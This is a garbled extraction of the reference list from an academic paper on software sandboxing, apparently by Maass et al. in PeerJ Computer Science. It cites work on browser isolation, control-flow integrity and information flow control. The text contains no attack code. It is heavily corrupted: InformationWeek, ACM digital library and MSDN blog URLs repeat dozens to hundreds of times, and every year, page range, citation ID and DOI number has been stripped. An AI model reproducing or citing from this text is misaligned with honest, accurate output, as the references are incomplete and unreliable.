http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /peerj-cs. chang w, streiff b, lin c. . efficient and extensible security enforcement using dynamic data flow analysis. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . chen ey, bau j, reis c, barth a, jackson c. . app isolation: get the security of multiple browsers with just one. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . chen s, ross d, wang y-m. . an analysis of browser domain-isolation bugs and a light-weight transparent defense mechanism. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . coker z, maass m, ding t, le goues c, sunshine j. . evaluating the flexibility of the java sandbox. in: annual computer security applications conference (acsac ). new york: acm, – . cox rs, gribble sd, levy hm, hansen jg. . a safety-oriented platform for web applications. in: ieee symposium on security and privacy (sp ’ ). washington, dc: ieee computer society, – . criswell j, dautenhahn n, adve v. . kcofi: complete control-flow integrity for commodity operating system kernels. in: ieee symposium on security and privacy. washington, dc: ieee, – . criswell j, lenharth a, dhurjati d, adve v. . secure virtual architecture: a safe execution environment for commodity operating systems. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . de groef w, devriese d, nikiforakis n, piessens f. . flowfox: a web browser with flexible and precise information flow control. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . denzin nk, lincoln ys. . introduction: the discipline and practice of qualitative research. in: the sage handbook of qualitative research. th edition. thousand oaks: sage. dunn am, lee mz, jana s, kim s, silberstein m, xu y, shmatikov v, witchel e. . eternal sunshine of the spotless machine: protecting privacy with ephemeral channels. in: usenix symposium on operating systems design and implementation (osdi) (osdi’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . efstathopoulos p, krohn m, vandebogart s, frey c, ziegler d, kohler e, mazières d, kaashoek f, morris r. . labels and event processes in the asbestos operating system. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . erlingsson ú, abadi m, vrable m, budiu m, necula gc. . xfi: software guards for system address spaces. in: usenix symposium on operating systems design and implementation (osdi) (osdi ’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm? id= . . feldman aj, zeller wp, freedman mj, felten ew. . sporc: group collaboration using untrusted cloud resources. in: usenix symposium on operating systems design and implementation (osdi) (osdi’ ). berkeley: usenix association, . available at http://dl. acm.org/citation.cfm?id= . . garfinkel t, pfaff b, chow j, rosenblum m, boneh d. . terra: a virtual machine-based platform for trusted computing. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . geneiatakis d, portokalidis g, kemerlis vp, keromytis ad. . adaptive defenses for commodity software through virtual application partitioning. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /peerj-cs. giffin db, levy a, stefan d, terei d, mazières d, mitchell jc, russo a. . hails: protecting data privacy in untrusted web applications. in: usenix symposium on operating systems design and implementation (osdi) (osdi’ ). berkeley: usenix association, – . available at http: //dl.acm.org/citation.cfm?id= . . giuffrida c, kuijsten a, tanenbaum as. . enhanced operating system security through efficient and fine-grained address space randomization. in: usenix security (security’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . graydon pj, knight jc, strunk ea. . assurance based development of critical systems. in: dependable systems and networks. washington, d.c.: ieee, – . hartley j. . current findings from research on structured abstracts. journal of the medical library association ( ): – . haynes rb, mulrow cd, huth ej, altman dg, gardner mj. . more informative abstracts revisited. annals of internal medicine ( ): – doi . / - - - - . hiser j, nguyen-tuong a, co m, hall m, davidson jw. . ilr: where’d my gadgets go? in: ieee symposium on security and privacy (sp ’ ). washington, d.c.: ieee computer society, – . hogg j. . control flow guard. available at http://blogs.msdn.com/b/vcblog/archive/ / / / visual-studio- -preview-work-in-progress-security-feature.aspx (accessed april ). homescu a, brunthaler s, larsen p, franz m. . librando: transparent code randomization for just-in-time compilers. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . jana s, porter de, shmatikov v. . txbox: bbuilding secure, efficient sandboxes with system transactions. in: ieee symposium on security and privacy. washington, dc: ieee, – . kagdi h, collard ml, maletic ji. . a survey and taxonomy of approaches for mining software repositories in the context of software evolution. journal of software maintenance and evolution: research and practice ( ): – doi . /smr. . kaufman l, rousseeuw pj. . finding groups in data: an introduction to cluster analysis. vol. . new york: john wiley & sons. kelly t. . arguing safety—a systematic approach to safety case management. phd dissertation, department of computer science, university of york. kemerlis vp, portokalidis g, keromytis ad. . kguard: lightweight kernel protection against return-to-user attacks. in: usenix security (security’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . kitchenham b, brereton op, budgen d, turner m, bailey j, linkman s. . systematic literature reviews in software engineering—a systematic literature review. information and software technology ( ): – doi . /j.infsof. . . . knight j. . the importance of security cases: proof is good, but not enough. ieee security privacy magazine ( ): – doi . /msp. . . krippendorff kh. . content analysis: an introduction to its methodology. thousand oaks: sage. krohn m, yip a, brodsky m, cliffer n, kaashoek mf, kohler e, morris r. . information flow control for standard os abstractions. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . lázár a, ábel d, vicsek t. . modularity measure of networks with overlapping communities. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . / - - - - http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx http://blogs.msdn.com/b/vcblog/archive/ / / /visual-studio- -preview-work-in-progress-security-feature.aspx 